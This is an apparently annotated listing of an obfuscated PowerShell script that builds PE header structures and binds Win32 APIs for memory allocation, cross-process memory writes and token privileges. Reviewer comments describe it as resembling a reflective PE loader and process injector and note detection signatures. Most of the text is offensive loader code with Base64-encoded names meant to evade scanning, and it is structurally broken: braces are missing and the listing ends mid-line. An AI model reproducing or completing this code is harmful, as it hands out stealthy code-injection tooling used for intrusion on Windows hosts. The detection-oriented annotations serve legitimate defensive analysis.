${01110001001010011} = ${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('ZQBfAHIAZQBzAA=='))), [UInt16[]], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMALAAgAEgAYQBzAEYAaQBlAGwAZABNAGEAcgBzAGgAYQBsAA=='))))
${10000110100001011} = [System.Runtime.InteropServices.UnmanagedType]::ByValArray
${10110100110001110} = @([System.Runtime.InteropServices.MarshalAsAttribute].GetField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwBpAHoAZQBDAG8AbgBzAHQA')))))
${10001000110011000} = New-Object System.Reflection.Emit.CustomAttributeBuilder(${10101111111100000}, ${10000110100001011}, ${10110100110001110}, @([Int32] 4))
${01110001001010011}.SetCustomAttribute(${10001000110011000})
${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('ZQBfAG8AZQBtAGkAZAA='))), [UInt16], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA')))) | Out-Null
${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('ZQBfAG8AZQBtAGkAbgBmAG8A'))), [UInt16], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA')))) | Out-Null
${01111110100000001} = ${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('ZQBfAHIAZQBzADIA'))), [UInt16[]], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMALAAgAEgAYQBzAEYAaQBlAGwAZABNAGEAcgBzAGgAYQBsAA=='))))
${10000110100001011} = [System.Runtime.InteropServices.UnmanagedType]::ByValArray
${10001000110011000} = New-Object System.Reflection.Emit.CustomAttributeBuilder(${10101111111100000}, ${10000110100001011}, ${10110100110001110}, @([Int32] 10))
${01111110100000001}.SetCustomAttribute(${10001000110011000})
${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('ZQBfAGwAZgBhAG4AZQB3AA=='))), [Int32], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA')))) | Out-Null
${00000110010110011} = ${10001111001010101}.CreateType()
$Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_DOS_HEADER -Value ${00000110010110011}
${01001001010001110} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQB1AHQAbwBMAGEAeQBvAHUAdAAsACAAQQBuAHMAaQBDAGwAYQBzAHMALAAgAEMAbABhAHMAcwAsACAAUAB1AGIAbABpAGMALAAgAFMAZQBxAHUAZQBuAHQAaQBhAGwATABhAHkAbwB1AHQALAAgAFMAZQBhAGwAZQBkACwAIABCAGUAZgBvAHIAZQBGAGkAZQBsAGQASQBuAGkAdAA=')))
${10001111001010101} = ${00101100111000111}.DefineType($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SQBNAEEARwBFAF8AUwBFAEMAVABJAE8ATgBfAEgARQBBAEQARQBSAA=='))), ${01001001010001110}, [System.ValueType], 40)
${01001111000010010} = ${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TgBhAG0AZQA='))), [Char[]], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMALAAgAEgAYQBzAEYAaQBlAGwAZABNAGEAcgBzAGgAYQBsAA=='))))
${10000110100001011} = [System.Runtime.InteropServices.UnmanagedType]::ByValArray
${10001000110011000} = New-Object System.Reflection.Emit.CustomAttributeBuilder(${10101111111100000}, ${10000110100001011}, ${10110100110001110}, @([Int32] 8))
${01001111000010010}.SetCustomAttribute(${10001000110011000})
${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VgBpAHIAdAB1AGEAbABTAGkAegBlAA=='))), [UInt32], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA')))) | Out-Null
${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VgBpAHIAdAB1AGEAbABBAGQAZAByAGUAcwBzAA=='))), [UInt32], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA')))) | Out-Null
${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwBpAHoAZQBPAGYAUgBhAHcARABhAHQAYQA='))), [UInt32], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA')))) | Out-Null
${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UABvAGkAbgB0AGUAcgBUAG8AUgBhAHcARABhAHQAYQA='))), [UInt32], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA')))) | Out-Null
${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UABvAGkAbgB0AGUAcgBUAG8AUgBlAGwAbwBjAGEAdABpAG8AbgBzAA=='))), [UInt32], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA')))) | Out-Null
${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UABvAGkAbgB0AGUAcgBUAG8ATABpAG4AZQBuAHUAbQBiAGUAcgBzAA=='))), [UInt32], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA')))) | Out-Null
${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TgB1AG0AYgBlAHIATwBmAFIAZQBsAG8AYwBhAHQAaQBvAG4AcwA='))), [UInt16], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA')))) | Out-Null
${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TgB1AG0AYgBlAHIATwBmAEwAaQBuAGUAbgB1AG0AYgBlAHIAcwA='))), [UInt16], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA')))) | Out-Null
${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QwBoAGEAcgBhAGMAdABlAHIAaQBzAHQAaQBjAHMA'))), [UInt32], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA')))) | Out-Null
${10111010011010101} = ${10001111001010101}.CreateType()
$Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_SECTION_HEADER -Value ${10111010011010101}
${01001001010001110} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQB1AHQAbwBMAGEAeQBvAHUAdAAsACAAQQBuAHMAaQBDAGwAYQBzAHMALAAgAEMAbABhAHMAcwAsACAAUAB1AGIAbABpAGMALAAgAFMAZQBxAHUAZQBuAHQAaQBhAGwATABhAHkAbwB1AHQALAAgAFMAZQBhAGwAZQBkACwAIABCAGUAZgBvAHIAZQBGAGkAZQBsAGQASQBuAGkAdAA=')))
${10001111001010101} = ${00101100111000111}.DefineType($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SQBNAEEARwBFAF8AQgBBAFMARQBfAFIARQBMAE8AQwBBAFQASQBPAE4A'))), ${01001001010001110}, [System.ValueType], 8)
${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VgBpAHIAdAB1AGEAbABBAGQAZAByAGUAcwBzAA=='))), [UInt32], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA')))) | Out-Null
${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwBpAHoAZQBPAGYAQgBsAG8AYwBrAA=='))), [UInt32], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA')))) | Out-Null
${01011100001010010} = ${10001111001010101}.CreateType()
$Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_BASE_RELOCATION -Value ${01011100001010010}
${01001001010001110} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQB1AHQAbwBMAGEAeQBvAHUAdAAsACAAQQBuAHMAaQBDAGwAYQBzAHMALAAgAEMAbABhAHMAcwAsACAAUAB1AGIAbABpAGMALAAgAFMAZQBxAHUAZQBuAHQAaQBhAGwATABhAHkAbwB1AHQALAAgAFMAZQBhAGwAZQBkACwAIABCAGUAZgBvAHIAZQBGAGkAZQBsAGQASQBuAGkAdAA=')))
${10001111001010101} = ${00101100111000111}.DefineType($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SQBNAEEARwBFAF8ASQBNAFAATwBSAFQAXwBEAEUAUwBDAFIASQBQAFQATwBSAA=='))), ${01001001010001110}, [System.ValueType], 20)
${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QwBoAGEAcgBhAGMAdABlAHIAaQBzAHQAaQBjAHMA'))), [UInt32], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA')))) | Out-Null
${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VABpAG0AZQBEAGEAdABlAFMAdABhAG0AcAA='))), [UInt32], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA')))) | Out-Null
${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RgBvAHIAdwBhAHIAZABlAHIAQwBoAGEAaQBuAA=='))), [UInt32], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA')))) | Out-Null
${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TgBhAG0AZQA='))), [UInt32], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA')))) | Out-Null
${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RgBpAHIAcwB0AFQAaAB1AG4AawA='))), [UInt32], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA')))) | Out-Null
${00001011010111101} = ${10001111001010101}.CreateType()
$Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_IMPORT_DESCRIPTOR -Value ${00001011010111101}
${01001001010001110} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQB1AHQAbwBMAGEAeQBvAHUAdAAsACAAQQBuAHMAaQBDAGwAYQBzAHMALAAgAEMAbABhAHMAcwAsACAAUAB1AGIAbABpAGMALAAgAFMAZQBxAHUAZQBuAHQAaQBhAGwATABhAHkAbwB1AHQALAAgAFMAZQBhAGwAZQBkACwAIABCAGUAZgBvAHIAZQBGAGkAZQBsAGQASQBuAGkAdAA=')))
${10001111001010101} = ${00101100111000111}.DefineType($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SQBNAEEARwBFAF8ARQBYAFAATwBSAFQAXwBEAEkAUgBFAEMAVABPAFIAWQA='))), ${01001001010001110}, [System.ValueType], 40)
${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QwBoAGEAcgBhAGMAdABlAHIAaQBzAHQAaQBjAHMA'))), [UInt32], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA')))) | Out-Null
${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VABpAG0AZQBEAGEAdABlAFMAdABhAG0AcAA='))), [UInt32], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA')))) | Out-Null
${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TQBhAGoAbwByAFYAZQByAHMAaQBvAG4A'))), [UInt16], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA')))) | Out-Null
${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TQBpAG4AbwByAFYAZQByAHMAaQBvAG4A'))), [UInt16], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA')))) | Out-Null
${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TgBhAG0AZQA='))), [UInt32], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA')))) | Out-Null
${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QgBhAHMAZQA='))), [UInt32], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA')))) | Out-Null
${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TgB1AG0AYgBlAHIATwBmAEYAdQBuAGMAdABpAG8AbgBzAA=='))), [UInt32], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA')))) | Out-Null
${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TgB1AG0AYgBlAHIATwBmAE4AYQBtAGUAcwA='))), [UInt32], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA')))) | Out-Null
${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQBkAGQAcgBlAHMAcwBPAGYARgB1AG4AYwB0AGkAbwBuAHMA'))), [UInt32], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA')))) | Out-Null
${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQBkAGQAcgBlAHMAcwBPAGYATgBhAG0AZQBzAA=='))), [UInt32], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA')))) | Out-Null
${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQBkAGQAcgBlAHMAcwBPAGYATgBhAG0AZQBPAHIAZABpAG4AYQBsAHMA'))), [UInt32], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA')))) | Out-Null
${10010100001011010} = ${10001111001010101}.CreateType()
$Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_EXPORT_DIRECTORY -Value ${10010100001011010}
${01001001010001110} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQB1AHQAbwBMAGEAeQBvAHUAdAAsACAAQQBuAHMAaQBDAGwAYQBzAHMALAAgAEMAbABhAHMAcwAsACAAUAB1AGIAbABpAGMALAAgAFMAZQBxAHUAZQBuAHQAaQBhAGwATABhAHkAbwB1AHQALAAgAFMAZQBhAGwAZQBkACwAIABCAGUAZgBvAHIAZQBGAGkAZQBsAGQASQBuAGkAdAA=')))
${10001111001010101} = ${00101100111000111}.DefineType($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TABVAEkARAA='))), ${01001001010001110}, [System.ValueType], 8)
${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TABvAHcAUABhAHIAdAA='))), [UInt32], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA')))) | Out-Null
${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SABpAGcAaABQAGEAcgB0AA=='))), [UInt32], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA')))) | Out-Null
${01010110100111001} = ${10001111001010101}.CreateType()
$Win32Types | Add-Member -MemberType NoteProperty -Name LUID -Value ${01010110100111001}
${01001001010001110} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQB1AHQAbwBMAGEAeQBvAHUAdAAsACAAQQBuAHMAaQBDAGwAYQBzAHMALAAgAEMAbABhAHMAcwAsACAAUAB1AGIAbABpAGMALAAgAFMAZQBxAHUAZQBuAHQAaQBhAGwATABhAHkAbwB1AHQALAAgAFMAZQBhAGwAZQBkACwAIABCAGUAZgBvAHIAZQBGAGkAZQBsAGQASQBuAGkAdAA=')))
${10001111001010101} = ${00101100111000111}.DefineType($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TABVAEkARABfAEEATgBEAF8AQQBUAFQAUgBJAEIAVQBUAEUAUwA='))), ${01001001010001110}, [System.ValueType], 12)
${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TAB1AGkAZAA='))), ${01010110100111001}, $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA')))) | Out-Null
${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQB0AHQAcgBpAGIAdQB0AGUAcwA='))), [UInt32], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA')))) | Out-Null
${01001111101101010} = ${10001111001010101}.CreateType()
$Win32Types | Add-Member -MemberType NoteProperty -Name LUID_AND_ATTRIBUTES -Value ${01001111101101010}
${01001001010001110} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQB1AHQAbwBMAGEAeQBvAHUAdAAsACAAQQBuAHMAaQBDAGwAYQBzAHMALAAgAEMAbABhAHMAcwAsACAAUAB1AGIAbABpAGMALAAgAFMAZQBxAHUAZQBuAHQAaQBhAGwATABhAHkAbwB1AHQALAAgAFMAZQBhAGwAZQBkACwAIABCAGUAZgBvAHIAZQBGAGkAZQBsAGQASQBuAGkAdAA=')))
${10001111001010101} = ${00101100111000111}.DefineType($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VABPAEsARQBOAF8AUABSAEkAVgBJAEwARQBHAEUAUwA='))), ${01001001010001110}, [System.ValueType], 16)
${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAByAGkAdgBpAGwAZQBnAGUAQwBvAHUAbgB0AA=='))), [UInt32], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA')))) | Out-Null
${10001111001010101}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAByAGkAdgBpAGwAZQBnAGUAcwA='))), ${01001111101101010}, $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA')))) | Out-Null
${10100111101010001} = ${10001111001010101}.CreateType()
$Win32Types | Add-Member -MemberType NoteProperty -Name TOKEN_PRIVILEGES -Value ${10100111101010001}
return $Win32Types
# Builds and returns a lookup object of Win32 numeric constants. Takes no
# parameters and reads no outer state.
#
# Returns: a System.Object with one NoteProperty per constant. Names and
# values match the Windows SDK definitions for memory allocation and page
# protection, base-relocation entry types, PE section/file characteristics,
# and access-token rights. How callers consume them is not visible in this
# block.
#
# NOTE(review): the property names below are plain text, while the struct
# and field names in the type-building code earlier in this script are
# Base64/UTF-16LE encoded. Script-block logging and content scanning can
# therefore still match on these identifiers.
Function _10101001111100001
$Win32Constants = New-Object System.Object
# Allocation-type flags (commit / reserve).
$Win32Constants | Add-Member -MemberType NoteProperty -Name MEM_COMMIT -Value 0x00001000
$Win32Constants | Add-Member -MemberType NoteProperty -Name MEM_RESERVE -Value 0x00002000
# Page-protection values.
$Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_NOACCESS -Value 0x01
$Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_READONLY -Value 0x02
$Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_READWRITE -Value 0x04
$Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_WRITECOPY -Value 0x08
$Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_EXECUTE -Value 0x10
$Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_EXECUTE_READ -Value 0x20
# Read+write+execute protection; private memory carrying this value is a
# common memory-scanning heuristic. Whether it is requested is decided by
# callers outside this block.
$Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_EXECUTE_READWRITE -Value 0x40
$Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_EXECUTE_WRITECOPY -Value 0x80
$Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_NOCACHE -Value 0x200
# Base-relocation entry types (padding, 32-bit fixup, 64-bit fixup).
$Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_REL_BASED_ABSOLUTE -Value 0
$Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_REL_BASED_HIGHLOW -Value 3
$Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_REL_BASED_DIR64 -Value 10
# Section-header Characteristics flags.
$Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_SCN_MEM_DISCARDABLE -Value 0x02000000
$Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_SCN_MEM_EXECUTE -Value 0x20000000
$Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_SCN_MEM_READ -Value 0x40000000
# NOTE(review): PowerShell parses this hex literal as a signed Int32, so the
# stored value is negative. Confirm callers test it with -band against the
# UInt32 Characteristics field rather than comparing numerically.
$Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_SCN_MEM_WRITE -Value 0x80000000
$Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_SCN_MEM_NOT_CACHED -Value 0x04000000
# Free-type flag (decommit).
$Win32Constants | Add-Member -MemberType NoteProperty -Name MEM_DECOMMIT -Value 0x4000
# File-header Characteristics flags (executable image / DLL).
$Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_FILE_EXECUTABLE_IMAGE -Value 0x0002
$Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_FILE_DLL -Value 0x2000
# Optional-header DllCharacteristics flags: relocatable at load time (ASLR)
# and DEP-compatible.
$Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE -Value 0x40
$Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_DLLCHARACTERISTICS_NX_COMPAT -Value 0x100
# Free-type flag (release).
$Win32Constants | Add-Member -MemberType NoteProperty -Name MEM_RELEASE -Value 0x8000
# Access-token rights and the "privilege enabled" attribute.
$Win32Constants | Add-Member -MemberType NoteProperty -Name TOKEN_QUERY -Value 0x0008
$Win32Constants | Add-Member -MemberType NoteProperty -Name TOKEN_ADJUST_PRIVILEGES -Value 0x0020
$Win32Constants | Add-Member -MemberType NoteProperty -Name SE_PRIVILEGE_ENABLED -Value 0x2
# Win32 error code 1008.
$Win32Constants | Add-Member -MemberType NoteProperty -Name ERROR_NO_TOKEN -Value 0x3f0
return $Win32Constants
# Builds and returns $Win32Functions, an object whose note properties are
# callable delegates for native Windows APIs.
#
# Every entry follows the same three steps:
#   1. _10001000101010101 <module> <export>  -> address of the export
#   2. _00101111101010001 @(param types) (return type) -> a delegate type
#   3. Marshal.GetDelegateForFunctionPointer(address, type) -> delegate
# No Add-Type or DllImport declaration appears in this block; the exports are
# bound through the two helper functions instead.
#
# Analyst notes:
# - Variable and helper names are obfuscated, but the module and export names
#   are plain bare-word arguments, so script block logging and AMSI content
#   still contain them verbatim.
# - The bound set combines memory allocation/protection, cross-process memory
#   read/write, remote thread creation and token privilege adjustment. Seen
#   together in a PowerShell host, that combination is typical of an in-memory
#   code loader/injector and is a reasonable hunting signature.
# - NOTE(review): the overall layout resembles the publicly documented
#   PowerSploit reflective PE loader; confirm against known samples.
# - The braces of the function body are missing from this listing (only the
#   OS-version `if` keeps its pair), so the text is not runnable as shown.
Function _01011100100111011
$Win32Functions = New-Object System.Object
# --- Local memory management and raw copies ---
${00100001110111000} = _10001000101010101 kernel32.dll VirtualAlloc
${00110111111110111} = _00101111101010001 @([IntPtr], [UIntPtr], [UInt32], [UInt32]) ([IntPtr])
${00100110111101100} = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer(${00100001110111000}, ${00110111111110111})
$Win32Functions | Add-Member NoteProperty -Name VirtualAlloc -Value ${00100110111101100}
${10110000011111111} = _10001000101010101 kernel32.dll VirtualAllocEx
${01011010010011100} = _00101111101010001 @([IntPtr], [IntPtr], [UIntPtr], [UInt32], [UInt32]) ([IntPtr])
${00110110000100100} = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer(${10110000011111111}, ${01011010010011100})
$Win32Functions | Add-Member NoteProperty -Name VirtualAllocEx -Value ${00110110000100100}
${01001111011111111} = _10001000101010101 msvcrt.dll memcpy
${01010100111010101} = _00101111101010001 @([IntPtr], [IntPtr], [UIntPtr]) ([IntPtr])
${01110000000000011} = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer(${01001111011111111}, ${01010100111010101})
$Win32Functions | Add-Member -MemberType NoteProperty -Name memcpy -Value ${01110000000000011}
${01100010001110111} = _10001000101010101 msvcrt.dll memset
${10011011011111100} = _00101111101010001 @([IntPtr], [Int32], [IntPtr]) ([IntPtr])
${01111010110111100} = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer(${01100010001110111}, ${10011011011111100})
$Win32Functions | Add-Member -MemberType NoteProperty -Name memset -Value ${01111010110111100}
# --- Module loading and export resolution ---
# The ANSI export LoadLibraryA is stored under the property name LoadLibrary.
${10001110110100001} = _10001000101010101 kernel32.dll LoadLibraryA
${00010010001001101} = _00101111101010001 @([String]) ([IntPtr])
${00101101100000111} = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer(${10001110110100001}, ${00010010001001101})
$Win32Functions | Add-Member -MemberType NoteProperty -Name LoadLibrary -Value ${00101101100000111}
# GetProcAddress is bound twice: once with a [String] second parameter and once
# with an [IntPtr] second parameter (presumably for lookups by ordinal; the
# call sites are outside this block).
${00101100001110101} = _10001000101010101 kernel32.dll GetProcAddress
${01001110110110010} = _00101111101010001 @([IntPtr], [String]) ([IntPtr])
${00101011111111000} = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer(${00101100001110101}, ${01001110110110010})
$Win32Functions | Add-Member -MemberType NoteProperty -Name GetProcAddress -Value ${00101011111111000}
${01011011000010101} = _10001000101010101 kernel32.dll GetProcAddress
${01000010101101010} = _00101111101010001 @([IntPtr], [IntPtr]) ([IntPtr])
${00000110100100110} = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer(${01011011000010101}, ${01000010101101010})
$Win32Functions | Add-Member -MemberType NoteProperty -Name GetProcAddressIntPtr -Value ${00000110100100110}
${01110011000010011} = _10001000101010101 kernel32.dll VirtualFree
${10001110100111011} = _00101111101010001 @([IntPtr], [UIntPtr], [UInt32]) ([Bool])
${01011110001000001} = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer(${01110011000010011}, ${10001110100111011})
$Win32Functions | Add-Member NoteProperty -Name VirtualFree -Value ${01011110001000001}
${00010011111110101} = _10001000101010101 kernel32.dll VirtualFreeEx
${01001101011101111} = _00101111101010001 @([IntPtr], [IntPtr], [UIntPtr], [UInt32]) ([Bool])
${10001000101110101} = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer(${00010011111110101}, ${01001101011101111})
$Win32Functions | Add-Member NoteProperty -Name VirtualFreeEx -Value ${10001000101110101}
# The last VirtualProtect parameter is a by-ref UInt32 (MakeByRefType).
${01111011010110110} = _10001000101010101 kernel32.dll VirtualProtect
${00111101000101100} = _00101111101010001 @([IntPtr], [UIntPtr], [UInt32], [UInt32].MakeByRefType()) ([Bool])
${00001101010110001} = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer(${01111011010110110}, ${00111101000101100})
$Win32Functions | Add-Member NoteProperty -Name VirtualProtect -Value ${00001101010110001}
${00110001110111111} = _10001000101010101 kernel32.dll GetModuleHandleA
${00101100101101101} = _00101111101010001 @([String]) ([IntPtr])
${10100001011111110} = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer(${00110001110111111}, ${00101100101101101})
$Win32Functions | Add-Member NoteProperty -Name GetModuleHandle -Value ${10100001011111110}
${10111000010011010} = _10001000101010101 kernel32.dll FreeLibrary
${00111011101111101} = _00101111101010001 @([IntPtr]) ([Bool])
${00011100000000001} = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer(${10111000010011010}, ${00111011101111101})
$Win32Functions | Add-Member -MemberType NoteProperty -Name FreeLibrary -Value ${00011100000000001}
# --- Cross-process access: open, write, read, start a thread, wait ---
# These are the bindings most relevant to process-access and remote-thread
# telemetry on the endpoint.
${10100010000101000} = _10001000101010101 kernel32.dll OpenProcess
${01110101100000101} = _00101111101010001 @([UInt32], [Bool], [UInt32]) ([IntPtr])
${00101011000011110} = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer(${10100010000101000}, ${01110101100000101})
$Win32Functions | Add-Member -MemberType NoteProperty -Name OpenProcess -Value ${00101011000011110}
${10000101101000001} = _10001000101010101 kernel32.dll WaitForSingleObject
${00010100100010101} = _00101111101010001 @([IntPtr], [UInt32]) ([UInt32])
${00111100101100110} = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer(${10000101101000001}, ${00010100100010101})
$Win32Functions | Add-Member -MemberType NoteProperty -Name WaitForSingleObject -Value ${00111100101100110}
${00111011100000100} = _10001000101010101 kernel32.dll WriteProcessMemory
${10010110111110101} = _00101111101010001 @([IntPtr], [IntPtr], [IntPtr], [UIntPtr], [UIntPtr].MakeByRefType()) ([Bool])
